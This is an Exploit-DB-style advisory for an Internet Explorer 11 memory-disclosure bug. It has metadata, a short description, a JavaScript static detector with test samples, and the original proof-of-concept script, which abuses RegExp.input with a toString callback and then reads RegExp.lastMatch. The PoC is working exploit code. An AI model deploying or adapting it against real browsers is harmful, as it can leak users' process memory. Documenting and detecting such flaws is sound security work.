Vendor: Internet Explorer
By: Anonymous
CVSS: 8.8 (HIGH)
Vulnerability type: Memory Disclosure
CWE: 200
Product Name: Internet Explorer
Affected Version From: IE11
Affected Version To: IE11
Patch Exists: Yes
Related CWE: N/A
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 64-bit
2020

Memory Disclosure Vulnerability in Internet Explorer

There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure. This was tested on IE11 running on Windows 7 64-bit with the latest patches applied. The proof of concept assigns an object with a custom toString method to the RegExp.input property; that method calls String.prototype.match on a large string, and the script then reads RegExp.lastMatch, which can result in pieces of memory being displayed.

Mitigation:

Users should ensure that their Internet Explorer is up to date with the latest security patches.
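
A heuristic static check for the pattern the proof of concept uses, as an added example that is not part of the original entry or its author's code: it flags script blocks that assign an object carrying a toString or valueOf callback to RegExp.input (or its alias RegExp.$_) and also reference a legacy static match property such as RegExp.lastMatch. The function name scanHtml, the two sample documents, and the coverage of valueOf and the aliases are assumptions of this example.

```javascript
// Added example: heuristic static check, not a complete detector.
// Assignment of an object literal carrying a conversion callback to the
// legacy static input property (RegExp.input, alias RegExp.$_). valueOf is
// included because string conversion falls back to it when toString is not callable.
const INPUT_ASSIGN =
  /RegExp\s*(?:\.\s*(?:input|\$_)|\[\s*["'](?:input|\$_)["']\s*\])\s*=(?!=)\s*\{[^}]*\b(?:toString|valueOf)\b/;
// Reference to a legacy static match property (lastMatch and friends, $&, $+, $1..$9).
const STATIC_READ =
  /RegExp\s*(?:\.\s*|\[\s*["'])(lastMatch|lastParen|leftContext|rightContext|\$[&+1-9])(?![\w$])/;
const SCRIPT_BLOCK = /(<script\b[^>]*>)([\s\S]*?)<\/script\s*>/gi;

// Returns one finding per <script> block that contains both patterns.
function scanHtml(html) {
  const findings = [];
  let script = 0;
  for (const m of html.matchAll(SCRIPT_BLOCK)) {
    const body = m[2];
    const assign = INPUT_ASSIGN.exec(body);
    const read = STATIC_READ.exec(body);
    if (assign && read) {
      // Offset of the assignment within the whole document, for line reporting.
      const offset = m.index + m[1].length + assign.index;
      findings.push({
        script,                                          // zero-based block index
        line: html.slice(0, offset).split("\n").length,  // line of the assignment
        reads: read[1],                                  // static property referenced
      });
    }
    script++;
  }
  return findings;
}

// Constructed sample shaped like the PoC (callback body replaced by a stub).
const SAMPLE_POC_SHAPED = [
  "<html>", "<script>",
  "function f() { return 'x'; }",
  "RegExp.input = {toString: f};",
  "var shown = RegExp.lastMatch;",
  "</script>", "</html>",
].join("\n");
// Constructed benign sample: ordinary use of the legacy statics, no callback.
const SAMPLE_BENIGN = [
  "<script>", "'abc'.match(/b/);", "RegExp.input = 'plain';",
  "console.log(RegExp.lastMatch);", "</script>",
].join("\n");

console.log(scanHtml(SAMPLE_POC_SHAPED), scanHtml(SAMPLE_BENIGN));
```

The check is purely textual, so minified or dynamically generated script can evade it; treat a hit as a reason to inspect the page, not as proof.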

Exploit-DB raw data:

/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Windows 7 64-bit with the latest patches applied.

PoC:

=========================================
*/

<!-- saved from url=(0014)about:internet -->
<script>

function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}

main();

</script>

/*
=========================================

Note that sometimes the PoC results in a crash (I made no attempt to make it reliable), while sometimes it results in pieces of memory being displayed.
*/